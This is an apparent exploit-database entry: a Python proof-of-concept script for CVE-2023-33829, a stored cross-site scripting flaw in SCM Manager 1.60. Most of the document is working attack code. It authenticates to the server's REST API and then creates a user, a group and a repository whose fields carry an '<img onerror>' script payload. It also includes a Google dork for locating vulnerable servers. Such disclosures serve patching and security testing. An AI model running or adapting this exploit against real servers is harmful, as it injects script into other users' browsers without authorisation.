SCM Manager 1.60 Cross Site Scripting

#!/usr/bin/python3# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)# Google Dork: intitle:"SCM Manager" intext:1.60# Date: 05-25-2023# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)# Vendor Homepage: https://scm-manager.org/# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/# Version: 1.2 <= 1.60# Tested on: Debian based# CVE: CVE-2023-33829# Modulesimport requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={  'username': user, # change if you have any other user with write permissions  'password': password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200:  print("[+] Authentication successfully")else:  print("[-] Failed to authenticate")  sys.exit(1)new_user={  "name": "newUser",  "displayName": "<img src=x onerror=alert('XSS')>",  "mail": "",  "password": "",  "admin": False,  "active": True,  "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={  "name": "newGroup",  "description": "<img src=x onerror=alert('XSS')>",  "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={  "name": "newRepo",  "type": "svn",  "contact": "",  "description": "<img src=x onerror=alert('XSS')>",  "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")